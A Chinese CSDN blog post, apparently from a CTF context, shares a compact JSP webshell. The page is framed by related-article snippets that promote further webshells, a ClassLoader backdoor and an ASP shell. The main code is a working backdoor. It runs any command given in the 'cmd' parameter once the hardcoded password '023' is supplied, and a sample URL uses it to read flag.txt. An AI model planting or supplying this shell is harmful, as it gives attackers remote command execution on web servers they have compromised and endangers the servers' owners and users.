分享一段jsp小马

最新推荐文章于 2021-11-13 12:40:03 发布
最新推荐文章于 2021-11-13 12:40:03 发布
阅读量3.6k 收藏
点赞数
分类专栏: web前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_28429161/article/details/107473322
版权 
<% @ page language = "java" import = "java.util.*,java.io.*" pageEncoding = "UTF-8"%>
< % !public static String excuteCmd(String c)
{
	StringBuilder line = new StringBuilder();
	try
	{
		Process pro = Runtime.getRuntime().exec(c);
		BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
		String temp = null;
		while ((temp = buf.readLine()) != null)
		{
			line.append(temp + "\\n");
		}buf.close();
	}
	catch (Exception e)
	{
		line.append(e.getMessage());
	}
	return line.toString();
}% >
< %
	if ("023".equals(request.getParameter("pwd")) && !"".equals(request.getParameter("cmd")))
	{
		out.println("<pre>" + excuteCmd(request.getParameter("cmd")) + "</pre>");
	}
	else {
		out.println(":-)");
	}
% >

利用http://127.0.0.1/chendi17.jsp?&pwd=023&cmd=cat%20flag.txt
安全狮
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webshell -真实可用的jsp
03-30
网上很多一句话、webshell 各种原因导致不能用,亲测可用的大马,忍痛割爱与大家分享
jsp一句话小马
最新发布
weixin_42786460的博客
09-09 871
jsp一句话小马
JSP
weixin_42437438的博客
04-10 224
关于Tomcat10 支持的是jakartaEE9,使用的是servlet5、jsp3和EL4 和javaEE8最大的区别是包名称,原来的javax.servlet全部变为jakarta.servlet JSP ####Servlet与JSP区别 简单的说,SUN首先发展出Servlet,其功能比较强劲,体系设计也很先进,只是,它输出HTML语句还是采用了老的CGI方式,是一句一句输出,所以,编写和修改HTML非常不方便。 后来SUN推出了类似于ASP的镶嵌型的JSP,把JSP标签镶嵌到HTML语句中,这样
JSP一句话小马
旺仔Sec&blog
11-13 3037
<%! class NATIVE extends ClassLoader{ NATIVE(ClassLoader c){super(c);} public Class routine(byte[] b){ return super.defineClass(b, 0, b.length); } } public byte[] runtime(String str) throws Exception { Class base64; byte[] value = null; ...
小马
Break-attack的博客
09-24 528
将代码写入txt 文档中编辑完成后将后缀改为asp上传到FTP中 &lt;meta http-equiv="Content-Type" content="text/html; charset=gb2312"&gt; &lt;title&gt;小马&lt;/title&gt; &lt;% on error resume Next '忽略页面的错误' if request("pass")
JSP一句话后门
10-31
JSP一句话后门 JSP一句话后门是指在Java Server Pages(JSP)中使用的一种后门技术,该技术允许攻击者在服务器上写入恶意文件,从而控制服务器的行为。 知识点1: JSP是什么? JSP全名为Java Server Pages,是一种...
JAVA JSP MYSQL购物分享系统
03-03
【JAVA JSP MYSQL购物分享系统】是一个基于Java技术,结合JSP(JavaServer Pages)和MYSQL数据库构建的在线平台,旨在提供用户一个分享购物心得、管理个人收藏的环境。在这个系统中,用户不仅可以注册和登录,还能...
Jsp servlet验证码工具类分享
10-18
主要为大家分享Jsp servlet验证码工具类,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
分享JSP中文乱码解决方法
01-08
一、JSP页面中文乱码 在JSP页面中,中文显示乱码有两种情况:一种是HTML中的中文乱码,另一种是在JSP中动态输出的中文乱码。 先看一个JSP程序: <%@ page language=java import=java.util.* %> <html>...
JSP学习经验小结分享
01-08
在一个JSP文件第一次被请求时,JSP引擎把该JSP文件转换成为一个servlet。而这个引擎本身也是一个servlet,在JSWDK或WEBLOGIC中,它就是JspServlet。 JSP引擎先把该JSP文件转换成一个Java源文件,在转换时如果发现jsp...
web上传小马
10-07
构造上传页面,可以上传webshell大马进一步得到网站权限ASP
jsp webshell cmd
10-18
jsp webshell cmd jsp 代码
JSP大马文件
08-13
jsp 木马, 放到网站可以访问的目录, 访问页面,即可管理服务器内容.切勿用于非法用途
JSP&EL&JSTL 基础入门
z398514470的博客
09-20 147
1. JSP: 指令 作用:用于配置JSP页面,导入资源文件 格式: <%@ 指令名称 属性名1=属性值1 属性名2=属性值2 … %> 分类: page: 配置JSP页面的 contentType:等同于response.setContentType() 设置响应体的mime类型以及字符集 设置当前jsp页面的编码(只能是高级的IDE才能生效,如果使用低级工具,则需要设置pageEncoding属性设置当前页面的字符集) import:导包 errorPage:当前
JSP网马
weixin_34174105的博客
11-16 470
http://p2j.cn/?p=1627 本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/1671483,如需转载请自行联系原作者 ...
ssm中文件的上传(jsp页面头像上传案例)———小马同学@Tian
SigleDog的博客
11-14 613
文件的上传和下载(jsp) 1. 文件的上传(jsp) 1.1 上传流程分析(头像上传案例) 1.需要新建虚拟路径!!! 2.Controoler做了两件事情:第一件事情把/upload/1.jpg 放到数据库中 第二件事情:必须把文件传入到本地磁盘的upoload文件夹中,因为这个文件夹就是虚拟路径 3.img标签的src的值,应该从数据库中取出来, 赋值给src属性 Src=”/upload/1.jpj” 虚拟路径 http:localhots:8080/upload/1.jpj 注:路径可根据自己喜
jsp执行外部命令
!Java
07-19 2988
直接一个例子说明:   Runtime runtime = Runtime.getRuntime();  Process process =null;  String line=null;  InputStream is =null;  InputStreamReader isr=null;  BufferedReader br =null;  String ip="请在这里打上你要ping的ip
一段JSP操作CMD的小代码
java开发指南博客 【转载】
10-17 308
jsp或者java里面执行CMD命令的小代码. &lt;%@ page import="java.io.*" %&gt; &lt;% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInput...
JSP写文件代码
luinstein的专栏
09-15 601
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">http://www.w3.org/1999/xhtml">                      -->              .STYLE2 {font-size: 12px}-->                 String path_in = "";   String
提供一段jsp测试代码
04-27
以下是一个简单的 JSP 测试代码,可以输出 "Hello World!": ```jsp <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Hello World!</title> </head> <body> <h1><% out.print("Hello World!"); %></h1> </body> </html> ``` 请注意,以上代码只是一个示例,实际应用中需要根据具体需求进行修改和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值